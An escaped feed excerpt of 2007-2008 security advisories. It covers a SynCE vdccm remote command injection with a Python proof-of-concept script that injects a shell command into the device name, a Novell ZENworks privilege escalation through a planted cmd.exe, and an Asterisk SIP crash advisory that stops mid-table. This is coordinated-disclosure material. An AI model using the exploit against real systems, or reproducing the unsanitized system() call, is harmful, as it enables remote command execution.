&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;a href=&quot;http://www.coresecurity.com/corelabs&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.coresecurity.com/corelabs&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; SynCE Remote Command Injection
&lt;br&gt;&lt;br&gt;*Advisory Information*
&lt;br&gt;&lt;br&gt;Title: SynCE Remote Command Injection
&lt;br&gt;Advisory ID: &amp;nbsp;CORE-2007-1106
&lt;br&gt;Advisory URL: &lt;a href=&quot;http://www.coresecurity.com/?action=item&amp;id=2070&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.coresecurity.com/?action=item&amp;id=2070&lt;/a&gt;&lt;br&gt;Date published: 2008-01-07
&lt;br&gt;Date of last update: 2008-01-03
&lt;br&gt;Vendors contacted: SynCE team
&lt;br&gt;Release mode: Coordinated release
&lt;br&gt;&lt;br&gt;*Vulnerability Information*
&lt;br&gt;&lt;br&gt;Class: Input validation error
&lt;br&gt;Remotely Exploitable: Yes
&lt;br&gt;Locally Exploitable: Yes
&lt;br&gt;Bugtraq ID: N/A
&lt;br&gt;CVE Name: N/A
&lt;br&gt;&lt;br&gt;*Vulnerability Description*
&lt;br&gt;&lt;br&gt;SynCE is an open source project, whose objective is to provide a way of
&lt;br&gt;communicating with a Windows CE or Pocket PC device, from a computer
&lt;br&gt;running Linux, *BSD or other unices. For more information see
&lt;br&gt;&lt;a href=&quot;http://www.synce.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.synce.org/&lt;/a&gt;&lt;br&gt;&lt;br&gt;The vdccm daemon (part of the SynCE package) is vulnerable to a remote
&lt;br&gt;command injection, which can be exploited by malicious remote attackers.
&lt;br&gt;The vulnerability is due to the vdccm daemon not properly sanitizing
&lt;br&gt;certain input before using it to invoke external scripts. This can be
&lt;br&gt;exploited to execute arbitrary commands with the privileges of the vdccm
&lt;br&gt;daemon by sending specially crafted requests.
&lt;br&gt;&lt;br&gt;*Vulnerable packages*
&lt;br&gt;&lt;br&gt;. Synce-dccm since version 0.92
&lt;br&gt;&lt;br&gt;*Non-vulnerable packages*
&lt;br&gt;&lt;br&gt;. Synce-dccm 0.91 and earlier.
&lt;br&gt;. SynCE-dccm 0.10.1
&lt;br&gt;&lt;br&gt;*Vendor Information, Solutions and Workarounds*
&lt;br&gt;&lt;br&gt;This vulnerability has been fixed in SynCE-dccm 0.10.1, available at
&lt;br&gt;&lt;a href=&quot;http://sourceforge.net/projects/synce/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://sourceforge.net/projects/synce/&lt;/a&gt;.
&lt;br&gt;&lt;br&gt;*Credits*
&lt;br&gt;&lt;br&gt;This vulnerability was discovered and researched by Alfredo Ortega and
&lt;br&gt;Oren Isacson from Core Security Technologies.
&lt;br&gt;&lt;br&gt;*Technical Description / Proof of Concept Code*
&lt;br&gt;&lt;br&gt;The vdccm daemon listens on port 5679 for incoming connections from a
&lt;br&gt;Windows CE device.
&lt;br&gt;The command injection exist on the name of the connected device. The
&lt;br&gt;code at src/utils.cpp, function &amp;nbsp;Utils::runScripts &amp;nbsp;contains the
&lt;br&gt;following code:
&lt;br&gt;&lt;br&gt;string command = string(path) + &amp;quot; &amp;quot; + action + &amp;quot; &amp;quot; + deviceName;
&lt;br&gt;system(command.c_str());
&lt;br&gt;&lt;br&gt;The contents of the string variable &amp;quot;deviceName&amp;quot; is controlled by the
&lt;br&gt;attacker.
&lt;br&gt;&lt;br&gt;The next python proof of concept script will remotely create an empty
&lt;br&gt;file named &amp;quot;/tmp/vulnerability&amp;quot; when used on a FreeBSD host running the
&lt;br&gt;vulnerable daemon.
&lt;br&gt;&lt;br&gt;- ---------------------------
&lt;br&gt;import socket, struct
&lt;br&gt;import time
&lt;br&gt;def AtoWChar(string):
&lt;br&gt;&amp;nbsp; &amp;nbsp; return ''.join([x+chr(0) for x in string])
&lt;br&gt;&lt;br&gt;HOST = '192.168.XXX.XXX'
&lt;br&gt;PORT = 5679
&lt;br&gt;c= socket.socket(socket.AF_INET, socket.SOCK_STREAM)
&lt;br&gt;c.connect((HOST, PORT))
&lt;br&gt;buf=&amp;quot;\x00&amp;quot;*0x18
&lt;br&gt;buf+='\x30\x00\x00\x00'
&lt;br&gt;buf+='\x30\x00\x00\x00'
&lt;br&gt;buf+='\x30\x00\x00\x00'
&lt;br&gt;buf+=&amp;quot;\x00&amp;quot;*12
&lt;br&gt;string=AtoWChar(&amp;quot;&amp;/usr/bin/touch /tmp/vulnerability&amp;quot;)
&lt;br&gt;buf+=string+&amp;quot;\x00\x00&amp;quot;+&amp;quot;\x00&amp;quot;*12
&lt;br&gt;c.send(struct.pack(&amp;quot;L&amp;quot;,63+len(string))+buf+&amp;quot;\x00&amp;quot; )
&lt;br&gt;- ---------------------------
&lt;br&gt;&lt;br&gt;NOTE: for this proof of concept to work, a script file is needed on the
&lt;br&gt;&amp;quot;$home$/.synce/scripts&amp;quot; directory. Some linux distributions ship with
&lt;br&gt;scripts on this directory by default.
&lt;br&gt;&lt;br&gt;*Report Timeline*
&lt;br&gt;&lt;br&gt;2007-11-12: Core notifies the SynCE team of the vulnerability.
&lt;br&gt;2007-11-13: Technical details sent by Core to SynCE team.
&lt;br&gt;2007-11-22: SynCE notifies Core that a fix has been produced, and will
&lt;br&gt;be released in the next SynCE official release.
&lt;br&gt;2007-12-20: SynCE releases version 0.10.1, which fixes this vulnerability.
&lt;br&gt;2008-01-07: CORE-2007-1106 advisory is published.
&lt;br&gt;&lt;br&gt;*References*
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://synce.sourceforge.net/synce/dccm.php&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://synce.sourceforge.net/synce/dccm.php&lt;/a&gt;&lt;br&gt;&lt;a href=&quot;http://synce.sourceforge.net/synce/architecture.php&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://synce.sourceforge.net/synce/architecture.php&lt;/a&gt;&lt;br&gt;&lt;br&gt;*About Corelabs*
&lt;br&gt;&lt;br&gt;CoreLabs, the research center of Core Security Technologies, is charged
&lt;br&gt;with anticipating the future needs and requirements for information
&lt;br&gt;security technologies.
&lt;br&gt;We conduct our research in several important areas of computer security
&lt;br&gt;including system vulnerabilities, cyber attack planning and simulation,
&lt;br&gt;source code auditing, and cryptography. Our results include problem
&lt;br&gt;formalization, identification of vulnerabilities, novel solutions and
&lt;br&gt;prototypes for new technologies.
&lt;br&gt;CoreLabs regularly publishes security advisories, technical papers,
&lt;br&gt;project information and shared software tools for public use at:
&lt;br&gt;&lt;a href=&quot;http://www.coresecurity.com/corelabs/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.coresecurity.com/corelabs/&lt;/a&gt;&lt;br&gt;&lt;br&gt;*About Core Security Technologies*
&lt;br&gt;&lt;br&gt;Core Security Technologies develops strategic solutions that help
&lt;br&gt;security-conscious organizations worldwide develop and maintain a
&lt;br&gt;proactive process for securing their networks. The company's flagship
&lt;br&gt;product, CORE IMPACT, is the most comprehensive product for performing
&lt;br&gt;enterprise security assurance testing. IMPACT evaluates network,
&lt;br&gt;endpoint and end-user vulnerabilities and identifies what resources are
&lt;br&gt;exposed. It enables organizations to determine if current security
&lt;br&gt;investments are detecting and preventing attacks. Core augments its
&lt;br&gt;leading technology solution with world-class security consulting
&lt;br&gt;services, including penetration testing and software security auditing.
&lt;br&gt;Based in Boston, MA and Buenos Aires, Argentina, Core Security
&lt;br&gt;Technologies can be reached at 617-399-6980 or on the Web at
&lt;br&gt;&lt;a href=&quot;http://www.coresecurity.com&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.coresecurity.com&lt;/a&gt;&lt;br&gt;&lt;br&gt;*DISCLAIMER*
&lt;br&gt;&lt;br&gt;The contents of this advisory are copyright (c) 2008 CORE Security
&lt;br&gt;Technologies and (c) 2008 CoreLabs, and may be distributed freely
&lt;br&gt;provided that no fee is charged for this distribution and proper credit
&lt;br&gt;is given.
&lt;br&gt;&lt;br&gt;*PGP/GPG KEYS*
&lt;br&gt;&lt;br&gt;This advisory has been signed with the GPG key of Core Security
&lt;br&gt;Technologies advisories team, which is available for download at
&lt;br&gt;&lt;a href=&quot;http://www.coresecurity.com/files/attachments/core_security_advisories.asc&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.coresecurity.com/files/attachments/core_security_advisories.asc&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;-----BEGIN PGP SIGNATURE-----
&lt;br&gt;Version: GnuPG v1.4.7 (MingW32)
&lt;br&gt;Comment: Using GnuPG with Mozilla - &lt;a href=&quot;http://enigmail.mozdev.org&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://enigmail.mozdev.org&lt;/a&gt;&lt;br&gt;&lt;br&gt;iD8DBQFHgn8ryNibggitWa0RApswAJ9ey+xpJ3XMB4UNJyVX8y8riyNOdQCfQgAR
&lt;br&gt;DddKr++Y5HTDdBlzOd/vjRw=
&lt;br&gt;=c7rd
&lt;br&gt;-----END PGP SIGNATURE-----
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/CORE-2007-1106%3A-SynCE-Remote-Command-Injection-tp14681584p14681584.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-14644252</id>
	<title>iDefense Security Advisory 12.24.07: Novell ZENworks Endpoint Security Management Local Privilege Escalation Vulnerability</title>
	<published>2008-01-04T13:42:46Z</published>
	<updated>2008-01-04T13:42:46Z</updated>
	<author>
		<name>iDefense Labs</name>
	</author>
	<content type="html">iDefense Security Advisory 12.24.07
&lt;br&gt;&lt;a href=&quot;http://labs.idefense.com/intelligence/vulnerabilities/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://labs.idefense.com/intelligence/vulnerabilities/&lt;/a&gt;&lt;br&gt;Dec 24, 2007
&lt;br&gt;&lt;br&gt;I. BACKGROUND
&lt;br&gt;&lt;br&gt;Novell ZENworks Endpoint Security Management (ESM) Security Client
&lt;br&gt;provides centrally managed, policy based firewall protection for
&lt;br&gt;clients. It is designed to be installed on all workstations within the
&lt;br&gt;enterprise. More information is available on the vendor's site at the
&lt;br&gt;following URL.
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.novell.com/products/zenworks/endpointsecuritymanagement/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.novell.com/products/zenworks/endpointsecuritymanagement/&lt;/a&gt;&lt;br&gt;&lt;br&gt;II. DESCRIPTION
&lt;br&gt;&lt;br&gt;Local exploitation of a privilege escalation vulnerability in Novell
&lt;br&gt;ZENworks Endpoint Security Management allows attackers to execute
&lt;br&gt;arbitrary code with SYSTEM privileges.
&lt;br&gt;&lt;br&gt;When the ZENworks ESM Security Client is installed on a workstation, the
&lt;br&gt;STEngine service is set to run under the local SYSTEM account. This
&lt;br&gt;service is implemented within the following executable.
&lt;br&gt;&lt;br&gt;&amp;nbsp; File Name: STEngine.exe (1,847,296 bytes)
&lt;br&gt;&amp;nbsp; Version: 3.5.0.20
&lt;br&gt;&amp;nbsp; MD5: B5402A1EC8D04130304EBA89AF843916
&lt;br&gt;&lt;br&gt;The service provides functionality for any user to generate a diagnostic
&lt;br&gt;report in order to aid in product troubleshooting. During report
&lt;br&gt;generation, STEngine attempts to execute various scripts by spawning
&lt;br&gt;command shells to gather system information. These scripts are
&lt;br&gt;dynamically generated in a directory which all users may write to.
&lt;br&gt;&lt;br&gt;STEngine will also attempt to locate a command shell in this directory
&lt;br&gt;and execute it if it is found. If a malicious local user places a
&lt;br&gt;binary named &amp;quot;cmd.exe&amp;quot; in this directory, STEngine will execute it with
&lt;br&gt;SYSTEM level privileges.
&lt;br&gt;&lt;br&gt;III. ANALYSIS
&lt;br&gt;&lt;br&gt;Exploitation allows unprivileged local users to take complete control of
&lt;br&gt;the affected system.
&lt;br&gt;&lt;br&gt;Exploitation is trivial and does not require any special tools or coding
&lt;br&gt;ability. If an attacker desires an interactive command prompt, a small
&lt;br&gt;wrapper application will be required in order to ensure that the
&lt;br&gt;command window is visible after execution.
&lt;br&gt;&lt;br&gt;IV. DETECTION
&lt;br&gt;&lt;br&gt;iDefense has confirmed the existence of this vulnerability in
&lt;br&gt;STEngine.exe version 3.5.0.20 as included with Novell Inc's ZENworks
&lt;br&gt;Endpoint Security Management 3.5. Other versions may also be affected.
&lt;br&gt;&lt;br&gt;V. WORKAROUND
&lt;br&gt;&lt;br&gt;iDefense is unaware of any effective workaround for this issue.
&lt;br&gt;&lt;br&gt;VI. VENDOR RESPONSE
&lt;br&gt;&lt;br&gt;Novell has addressed this vulnerability by releasing version 3.5.0.82 of
&lt;br&gt;Endpoint Security Management. To download this new version, visit the
&lt;br&gt;following URL.
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://download.novell.com/Download?buildid=5Y6xbs-OKLE&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://download.novell.com/Download?buildid=5Y6xbs-OKLE&lt;/a&gt;~
&lt;br&gt;&lt;br&gt;VII. CVE INFORMATION
&lt;br&gt;&lt;br&gt;The Common Vulnerabilities and Exposures (CVE) project has assigned the
&lt;br&gt;name CVE-2007-5665 to this issue. This is a candidate for inclusion in
&lt;br&gt;the CVE list (&lt;a href=&quot;http://cve.mitre.org/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://cve.mitre.org/&lt;/a&gt;), which standardizes names for
&lt;br&gt;security problems.
&lt;br&gt;&lt;br&gt;VIII. DISCLOSURE TIMELINE
&lt;br&gt;&lt;br&gt;09/24/2007 &amp;nbsp;Initial vendor notification
&lt;br&gt;09/25/2007 &amp;nbsp;Initial vendor response
&lt;br&gt;12/24/2007 &amp;nbsp;Coordinated public disclosure
&lt;br&gt;&lt;br&gt;IX. CREDIT
&lt;br&gt;&lt;br&gt;This vulnerability was reported to iDefense by Stephen Fewer of Harmony
&lt;br&gt;Security (www.harmonysecurity.com).
&lt;br&gt;&lt;br&gt;Get paid for vulnerability research
&lt;br&gt;&lt;a href=&quot;http://labs.idefense.com/methodology/vulnerability/vcp.php&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://labs.idefense.com/methodology/vulnerability/vcp.php&lt;/a&gt;&lt;br&gt;&lt;br&gt;Free tools, research and upcoming events
&lt;br&gt;&lt;a href=&quot;http://labs.idefense.com/&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://labs.idefense.com/&lt;/a&gt;&lt;br&gt;&lt;br&gt;X. LEGAL NOTICES
&lt;br&gt;&lt;br&gt;Copyright © 2008 iDefense, Inc.
&lt;br&gt;&lt;br&gt;Permission is granted for the redistribution of this alert
&lt;br&gt;electronically. It may not be edited in any way without the express
&lt;br&gt;written consent of iDefense. If you wish to reprint the whole or any
&lt;br&gt;part of this alert in any other medium other than electronically,
&lt;br&gt;please e-mail &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=14644252&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;customerservice@...&lt;/a&gt; for permission.
&lt;br&gt;&lt;br&gt;Disclaimer: The information in the advisory is believed to be accurate
&lt;br&gt;at the time of publishing based on currently available information. Use
&lt;br&gt;of the information constitutes acceptance for use in an AS IS condition.
&lt;br&gt;&amp;nbsp;There are no warranties with regard to this information. Neither the
&lt;br&gt;author nor the publisher accepts any liability for any direct,
&lt;br&gt;indirect, or consequential loss or damage arising from use of, or
&lt;br&gt;reliance on, this information.
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/iDefense-Security-Advisory-12.24.07%3A-Novell-ZENworks-Endpoint-Security-Management-Local-Privilege-Escalation-Vulnerability-tp14644252p14644252.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-14604557</id>
	<title>AST-2008-001: Crash from transfer using BYE with Also header</title>
	<published>2008-01-02T13:57:55Z</published>
	<updated>2008-01-02T13:57:55Z</updated>
	<author>
		<name>Asterisk Security Team-2</name>
	</author>
	<content type="html">&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Asterisk Project Security Advisory - AST-2008-001
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; +------------------------------------------------------------------------+
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; Product &amp;nbsp; &amp;nbsp; &amp;nbsp; | Asterisk &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp; |---------------------+--------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; Summary &amp;nbsp; &amp;nbsp; &amp;nbsp; | Remote Crash Vulnerability in SIP channel driver |
&lt;br&gt;&amp;nbsp; &amp;nbsp; |---------------------+--------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | Nature of Advisory &amp;nbsp;| Denial of Service &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp; |---------------------+--------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; Susceptibility &amp;nbsp; &amp;nbsp;| Remote Unauthenticated Sessions &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp; |---------------------+--------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp;Severity &amp;nbsp; &amp;nbsp; &amp;nbsp; | Critical &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp; |---------------------+--------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; Exploits Known &amp;nbsp; &amp;nbsp;| No &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp; |---------------------+--------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; Reported On &amp;nbsp; &amp;nbsp; | December 26, 2007 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp; |---------------------+--------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; Reported By &amp;nbsp; &amp;nbsp; | Grey VoIP (bugs.digium.com user greyvoip) &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp; |---------------------+--------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp;Posted On &amp;nbsp; &amp;nbsp; &amp;nbsp;| January 2, 2008 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp; |---------------------+--------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; Last Updated On &amp;nbsp; | January 2, 2008 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp; |---------------------+--------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp;Advisory Contact &amp;nbsp; | Joshua Colp &amp;lt;&lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=14604557&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;jcolp@...&lt;/a&gt;&amp;gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp; |---------------------+--------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp;CVE Name &amp;nbsp; &amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp; +------------------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; +------------------------------------------------------------------------+
&lt;br&gt;&amp;nbsp; &amp;nbsp; | Description | The handling of the BYE with Also transfer method was &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | broken during the development of Asterisk 1.4. If a &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | transfer attempt is made using this method the system &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | will immediately crash upon handling the BYE message due |
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | to trying to copy data into a NULL pointer. It is &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | important to note that a dialog must have already been &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | established and up in order for this to happen. &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp; +------------------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; +------------------------------------------------------------------------+
&lt;br&gt;&amp;nbsp; &amp;nbsp; | Resolution | A fix has been added so that the BYE with Also transfer &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| method now properly allocates and uses the transfer data &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| structure. It will no longer try to copy data into a NULL |
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| pointer and will operate properly. &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp; +------------------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; +------------------------------------------------------------------------+
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Affected Versions &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp; |------------------------------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Product &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | &amp;nbsp; Release &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| &amp;nbsp; Series &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp; |----------------------------+-------------+-----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp;Asterisk Open Source &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp;1.0.x &amp;nbsp; &amp;nbsp;| Unaffected &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp; |----------------------------+-------------+-----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp;Asterisk Open Source &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp;1.2.x &amp;nbsp; &amp;nbsp;| Unaffected &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp; |----------------------------+-------------+-----------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp; | &amp;nbsp; &amp;nbsp;Asterisk Open Source &amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp;1.4.x &amp;nbsp; &amp;nbsp;| All versions prior to &amp;nbsp; &amp;nbsp; &amp;nbsp; |
